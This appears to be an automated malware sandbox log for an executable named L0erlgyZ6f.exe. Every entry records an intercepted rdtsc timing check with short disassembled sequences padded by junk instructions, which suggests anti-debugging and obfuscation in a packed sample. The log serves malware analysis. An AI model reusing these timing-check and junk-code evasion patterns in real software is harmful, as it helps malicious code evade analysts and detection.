Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53E0C30 second address: 53E0C34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53E0C34 second address: 53E0C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007EFFE92369D4h 0x0000000e push eax 0x0000000f jmp 00007EFFE92369CBh 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007EFFE92369D5h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53C0E0E second address: 53C0E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53C0E12 second address: 53C0E2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53C0E2F second address: 53C0E35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53C0E35 second address: 53C0E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53C0E39 second address: 53C0E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53C0E3D second address: 53C0E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007EFFE92369D4h 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov si, di 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53C0E6A second address: 53C0E70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53C0E70 second address: 53C0E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53C0E76 second address: 53C0E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53B0AB5 second address: 53B0AC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53B0AC4 second address: 53B0ACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53B0ACA second address: 53B0ACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53B0ACE second address: 53B0AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007EFFE8794FB6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53B0AF1 second address: 53B0B00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53B0B00 second address: 53B0B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFE8794FB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53B0B18 second address: 53B0B2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007EFFE92369CAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53B0B2F second address: 53B0B35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53B0B35 second address: 53B0B88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007EFFE92369CCh 0x00000014 jmp 00007EFFE92369D5h 0x00000019 popfd 0x0000001a jmp 00007EFFE92369D0h 0x0000001f popad 0x00000020 mov eax, dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53B0B88 second address: 53B0B8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53B0B8C second address: 53B0B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5370179 second address: 537017D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 537017D second address: 5370183 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5370183 second address: 537019F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 537019F second address: 53701A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53701A3 second address: 53701B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53701B6 second address: 5370221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFFE92369CFh 0x00000008 call 00007EFFE92369D8h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007EFFE92369D0h 0x00000017 xchg eax, ebp 0x00000018 jmp 00007EFFE92369D0h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007EFFE92369D7h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53703B7 second address: 53703BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53703BD second address: 53703DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53703DA second address: 53703F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53703F7 second address: 5370428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 2FBEh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007EFFE92369D0h 0x00000014 and eax, 13D1CD88h 0x0000001a jmp 00007EFFE92369CBh 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5370428 second address: 53704A8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007EFFE8794FB8h 0x00000008 xor ax, AFE8h 0x0000000d jmp 00007EFFE8794FABh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov bx, cx 0x00000018 popad 0x00000019 xchg eax, edi 0x0000001a jmp 00007EFFE8794FB2h 0x0000001f test esi, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007EFFE8794FADh 0x00000029 pop eax 0x0000002a pushfd 0x0000002b jmp 00007EFFE8794FB1h 0x00000030 xor ah, 00000066h 0x00000033 jmp 00007EFFE8794FB1h 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53704A8 second address: 537052B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F005B644B1Eh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007EFFE92369CCh 0x00000016 or esi, 6C3CB238h 0x0000001c jmp 00007EFFE92369CBh 0x00000021 popfd 0x00000022 call 00007EFFE92369D8h 0x00000027 pushfd 0x00000028 jmp 00007EFFE92369D2h 0x0000002d add al, FFFFFFC8h 0x00000030 jmp 00007EFFE92369CBh 0x00000035 popfd 0x00000036 pop esi 0x00000037 popad 0x00000038 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 mov esi, edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 537052B second address: 5370546 instructions: 0x00000000 rdtsc 0x00000002 mov si, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov cx, dx 0x0000000a popad 0x0000000b je 00007F005ABA309Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov edx, eax 0x00000016 mov cx, 9D79h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5370546 second address: 5370596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007EFFE92369D1h 0x0000000b and ecx, 33973E46h 0x00000011 jmp 00007EFFE92369D1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov edx, dword ptr [esi+44h] 0x0000001d jmp 00007EFFE92369CEh 0x00000022 or edx, dword ptr [ebp+0Ch] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov si, di 0x0000002b mov cx, bx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5370596 second address: 537059B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 537059B second address: 53705C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007EFFE92369D9h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0008 second address: 53A0025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0025 second address: 53A0059 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007EFFE92369CEh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov edx, 7AF9A924h 0x00000016 mov ecx, ebx 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0059 second address: 53A005E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A005E second address: 53A0073 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0073 second address: 53A007A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A007A second address: 53A00AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c jmp 00007EFFE92369D0h 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A00AC second address: 53A00B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A00B0 second address: 53A00B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A00B6 second address: 53A00BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A00BC second address: 53A00C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A00C0 second address: 53A00EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007EFFE8794FB6h 0x00000011 pop eax 0x00000012 jmp 00007EFFE8794FABh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A00EF second address: 53A0135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007EFFE92369CEh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007EFFE92369D7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0135 second address: 53A014D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFE8794FB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A014D second address: 53A0151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0151 second address: 53A0231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007EFFE8794FAEh 0x0000000e xchg eax, esi 0x0000000f jmp 00007EFFE8794FB0h 0x00000014 mov esi, dword ptr [ebp+08h] 0x00000017 jmp 00007EFFE8794FB0h 0x0000001c sub ebx, ebx 0x0000001e pushad 0x0000001f mov bl, D6h 0x00000021 pushfd 0x00000022 jmp 00007EFFE8794FB8h 0x00000027 adc al, 00000008h 0x0000002a jmp 00007EFFE8794FABh 0x0000002f popfd 0x00000030 popad 0x00000031 test esi, esi 0x00000033 jmp 00007EFFE8794FB6h 0x00000038 je 00007F005AB6B162h 0x0000003e pushad 0x0000003f movzx esi, bx 0x00000042 pushfd 0x00000043 jmp 00007EFFE8794FB3h 0x00000048 sbb ax, AFAEh 0x0000004d jmp 00007EFFE8794FB9h 0x00000052 popfd 0x00000053 popad 0x00000054 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e call 00007EFFE8794FB6h 0x00000063 pop eax 0x00000064 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0231 second address: 53A0257 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ecx, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFFE92369D0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0257 second address: 53A025B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A025B second address: 53A0261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0261 second address: 53A0272 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFE8794FADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0272 second address: 53A02E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F005B60CAE0h 0x00000011 jmp 00007EFFE92369CEh 0x00000016 test byte ptr [77806968h], 00000002h 0x0000001d pushad 0x0000001e mov bx, si 0x00000021 mov esi, 759B9119h 0x00000026 popad 0x00000027 jne 00007F005B60CACEh 0x0000002d jmp 00007EFFE92369D4h 0x00000032 mov edx, dword ptr [ebp+0Ch] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007EFFE92369D7h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A02E4 second address: 53A0316 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007EFFE8794FAFh 0x00000009 add cl, FFFFFF9Eh 0x0000000c jmp 00007EFFE8794FB9h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0316 second address: 53A0332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 jmp 00007EFFE92369CCh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push esi 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0332 second address: 53A0337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0337 second address: 53A03C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007EFFE92369D4h 0x00000011 sub ah, 00000028h 0x00000014 jmp 00007EFFE92369CBh 0x00000019 popfd 0x0000001a mov ebx, ecx 0x0000001c popad 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007EFFE92369D0h 0x00000025 sbb esi, 146F2688h 0x0000002b jmp 00007EFFE92369CBh 0x00000030 popfd 0x00000031 jmp 00007EFFE92369D8h 0x00000036 popad 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007EFFE92369CDh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A03C3 second address: 53A03D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A03D8 second address: 53A03DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A03DE second address: 53A040F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFFE8794FB5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A040F second address: 53A0436 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFFE92369CDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0436 second address: 53A0446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFE8794FACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0446 second address: 53A044A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A04F8 second address: 53A04FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A04FE second address: 53A0504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0504 second address: 53A0508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0508 second address: 53A051F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esp, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFFE92369CBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A051F second address: 53A0537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFE8794FB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 53A0537 second address: 53A055D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007EFFE92369CBh 0x00000014 pop ecx 0x00000015 mov dx, 111Ch 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5390213 second address: 5390218 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5390218 second address: 5390259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007EFFE92369D5h 0x0000000a jmp 00007EFFE92369CBh 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007EFFE92369D5h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5380DE8 second address: 5380DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5380DEC second address: 5380DF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 5380DF2 second address: 5380E16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFFE8794FB0h 0x00000013 rdtsc
